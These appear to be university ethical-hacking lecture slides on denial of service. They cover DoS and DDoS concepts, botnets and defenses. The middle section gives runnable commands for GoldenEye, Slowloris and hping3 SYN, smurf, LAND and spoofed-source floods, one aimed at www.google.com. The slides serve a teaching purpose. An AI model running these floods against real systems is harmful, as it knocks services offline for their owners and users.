BNCS312 – Introduction to

Ethical Hacking

CHAPTER 4
Denial of Service

©ISBATUNIVERSITY–2023 Bachelors of Networking and Cyber

Chapter
Overview

• Understanding to Denial of Services

• Types of Denial-of-Service Attacks
• DDos Attack Classifications
• How to perform DDos attacks
• Defenses against DoS attacks

©ISBATUNIVERSITY–2023
How can a service be denied?

Using up resources is the most common approach Several ways..

• Crash the machine

• Put it into an infinite loop
• Crash routers on the path to the machine
• Use up a machine resource
• Use up a network resource
• Deny another service needed for this one (e.g. DNS)
What is Denial of Service?
What Is a DoS Attack?

A DoS (denial-of-service) attack is a cyberattack that makes a computer or

other device unavailable to its intended users. This is usually accomplished by
overwhelming the targeted machine with requests until normal traffic can no
longer be processed. With a DoS attack, a single computer launches the
attack. This differs from a DDoS (distributed denial-of-service) attack, in which
multiple systems simultaneously overwhelm a targeted system.

What Is a DDoS Attack?

A DDoS (distributed denial-of-service) attack happens when multiple systems

overwhelm the bandwidth or resources of a targeted system. A DDoS attack
uses various sources of attack traffic, often in the form of a botnet.
DoS Single Source
DoS Multiple Sources

DDoS
Collateral
damage points
DDoS Botnets

Botnet:
Collection of compromised computers that are controlled for the purposes of
carrying out DDoS attacks or other activities
Can be large in number Systems join a botnet when they become infected by
certain types of malware

Like a virus, but instead of harming the system, it wants to take it over
and control it
Through email attachments, website links, or IM links
Through unpatched operating system vulnerabilities
Botnets

multi-tier design
Zombies

Zombies
How to perform a Dos/Ddos Attacks
Common DDoS Attack Tools
• GoldenEye
• Slowloris
• Hping3 and many more…

©ISBATUNIVERSITY–2023
 Tool 1: Goldeneye
Goldeneye uses perfectly legitimate HTTP traffic.
Denial of service attack can be executed with the help of
Goldeneye by generating heavy traffic of botnets.

Goldeneye sends multiple requests to the target as a result

generates heavy traffic botnets.
Goldeneye is an open-source tool, so you can download it
from GitHub free of cost.

Goldeneye can be used to perform DDoS attacks on any

webserver.

©ISBATUNIVERSITY–2023
 Installation
Step 1: Open your Kali Linux and then Open your Terminal. Use the following
command to install the tool by cloning the GitHub repository.

git clone https://github.com/jseidl/GoldenEye.git

Step 2: Use the following command to move to Goldeneye directory.

cd GoldenEye

Step 3: Use the following command to list out the contents of the directory and
use the second command to run the tool.

ls

./goldeneye.py

©ISBATUNIVERSITY–2023
Step 4: You can see that the tool is asking for a URL that means the tool is
running successfully now.

Step 5: Use the below command to see how to use the tool works.

./goldeneye.py -h

Usage
Example 1: Use the GoldenEye tool to perform DDoS attack on any domain. ‘s’
is used to specify no. of concurrent sockets.

./goldeneye.py https://www.google.com -s 1000

The tool is running successfully and started attacking the domain

www.google.com. This tool is useful for security researchers.

©ISBATUNIVERSITY–2023
Example 2: To display all usage options of the golden eye
tool, type the following command

sudo ./goldeneye.py -h

Example 3: To send traffic in ‘random’ mode with 5 workers

running 10 connections each. ‘m’ is for type of method.

sudo ./goldeneye.py http://192.168.0.233:80/ -s 10 -m

random

©ISBATUNIVERSITY–2023
 Slowloris DDOS Attack

Slowloris is a free and Open source tool available on Github.

We can perform a denial of service attack using this tool.
It’s a framework written in python.

This tool allows a single machine to take down another machine’s

web server it uses perfectly legitimate HTTP traffic. It makes a full
TCP connection and then requires only a few hundred requests at
long-term and regular intervals. As a result, the tool doesn’t need
to spend a lot of traffic to exhaust the available connections on a
server.

©ISBATUNIVERSITY–2023
Uses of Slowloris:

• Slowloris sends multiple requests to the target as a result

generates heavy traffic botnets.
• Slowloris can be used to perform DDoS attacks on any
webserver.
• It is an open-source tool, so you can download it from GitHub
free of cost.
• It uses perfectly legitimate HTTP traffic.
• A denial-of-service attack can be executed with the help of
Slowloris by generating heavy
• traffic of botnets.

©ISBATUNIVERSITY–2023
Step 1: Open your Kali Linux and then Open your Terminal.

Step 2: Create a new Directory on Desktop named Slowloris using the following
command.
mkdir Slowloris

Step 3: Move to the directory that you have to create (Slowloris).

cd Slowloris

Step 4: Now you have to clone the Slowloris tool from Github so that you can
install it on your Kali Linux machine. For that, you only have to type the
following URL in your terminal within the Slowloris directory that you have
created.

git clone https://github.com/gkbrk/slowloris.git

©ISBATUNIVERSITY–2023
You have successfully installed the Slowloris tool in your Kali Linux. Now it’s
time to perform a denial of service using the following steps.

Step 5: Now go to the Action bar and click on split terminal vertically then you
will see that the two-terminal screen has been open now.

Step 6: Now you have to check the IP address of your machine to do that type
of following command.
ifconfig

Step 7: As you can see we got our IP address now it’s time to start the apache
server, start the apache server using the following command.

sudo service apache2 start

Step 8: Now we have to check the status of your server whether it is active or
not so to check the status of your server run the following command.
service apache2 status
©ISBATUNIVERSITY–2023
Step 9: We can see that our server is under active status it means is running
properly, now come back to the first terminal, and to check permissions run the
following command.

ls -l

Step 10: Now it’s time to run the tool using the following command.

python3 slowloris.py (your ip address) -s 500

Step 11: You can see the tool has started attacking that particular IP address
which we have given now to check whether its working or not go to your
browser and on your URL bar type that IP address, and you will see the site is
only loading and loading but not opening this is how Slowloris tool works.

©ISBATUNIVERSITY–2023
DOS Flood With hping3
DoS Attack with Hping3
Run the command: hping3 --flood -S -V --rand-source http://stv.com

Where:

--flood send packets as fast as possible

-S (Syn packet): legit TCP packet connection
-V verbose mode
--rand-source randomize the IP source address, like it's requested
from different systems (sort of DDoS)

©ISBATUNIVERSITY–2023
Port Scanning with hping3:
Its simple to perform port scanning on any host through hping3. Here below is the command
used to scan the
host;
•# hping3 -S — scan 21–500 Target
•# hping3 -S -p 80 Target

©ISBATUNIVERSITY–2023
2. SYN Flood Attack

Syn flood is also known as a half-open attack. In this

attack, the attacker sends multiple connection requests to
perform the distributed denial of service attack.

# hping3 -S -p 80 Target — flood

©ISBATUNIVERSITY–2023
3. LAND Attack

This is a kind of DoS (Denial of Service) attack in which a packet is

sent to a target machine with the same address ( Source Address and
destination address the same).

# hping3 -S -p 80 127.0.0.1 -a 127.0.0.1

©ISBATUNIVERSITY–2023
4. SMURF Attack:
This is a kind of DDoS attack in which spoofed source address send a
large amount of ICMP packets to the target address. It uses a victim
address as a source address to send/broadcast the multiple ICMP ping
request.

# hping3 — icmp — flood 127.0.0.1 -a 127.0.0.1

Run the following command check the response in the Wireshark that
multiple spoofed ICMP packets are sent in just second and perform a
flood on the destination server.

©ISBATUNIVERSITY–2023
5. Random Source Attack
In this attack, an attacker can send multiple random packets with
different source addresses to the target machine which may cause the
Distributed denial of service attack. It is difficult to identify the actual
source address after an incident occurs.

The output is highlight in the packet analyzer tool (Wireshark)

# hping3 -S -p 80 Target — flood — rand-source

©ISBATUNIVERSITY–2023
Are we safe from DDoS?

My machine are well secured

It does not matter. The problem is not your machine but everyone else

I have a Firewall
It does not matter. We slip with legitimate traffic or we bomb your
firewall
I use VPN
It does not matter. We can fill your VPN pipe
My system is very high provision
It does not matter. We can get bigger resource than you have

25
Why DoS Defense is difficult
Conceptual difficulties
Mostly random source packet
Moving filtering upstream requires communication

Practical difficulties
Routers don’t have many spare cycles for analysis/filtering
Networks must remain stable—bias against infrastructure change
Attack tracking can cross administrative boundaries
End-users/victims often see attack differently (more urgently) than network operators

Nonetheless, need to:

Maximize filtering of bad traffic
Minimize “collateral damage”
Defenses against DoS attacks

DoS attacks cannot be prevented entirely

Impractical to prevent the flash crowds without compromising network
performance
Three lines of defense against (D)DoS attacks
Attack prevention and preemption
Attack detection and filtering
Attack source traceback and identification

27
Attack prevention
Limit ability of systems to send spoofed packets
Filtering done as close to source as possible by routers/gateways
Reverse-path filtering ensure that the path back to claimed source is same
as the current packet’s path
Ex: On Cisco router “ip verify unicast reverse-path” command
Rate controls in upstream distribution nets
On specific packet types
Ex: Some ICMP, some UDP, TCP/SYN
Block IP broadcasts

28
Responding to attacks

Need good incident response plan

With contacts for ISP
Needed to impose traffic filtering upstream
Details of response process
Ideally have network monitors and IDS
To detect and notify abnormal traffic patterns

29
Responding to attacks cont’d ….

Identify the type of attack

Capture and analyze packets
Design filters to block attack traffic upstream
Identify and correct system application bugs
Have ISP trace packet flow back to source
May be difficult and time consuming
Necessary if legal action desired
Implement contingency plan
Update incident response plan

30
 DDoS Attack Trends

Attackers follow defense approaches, adjust their code to bypass defenses

Use of subnet spoofing defeats ingress filtering
Use of encryption and decoy packets, IRC or P2P obscures master-slave
communication
Encryption of attack packets defeats traffic analysis and signature detection
Pulsing attacks defeat slow defenses and traceback
Flash-crowd attacks generate application traffic
28

Thank you

©ISBATUNIVERSITY–2023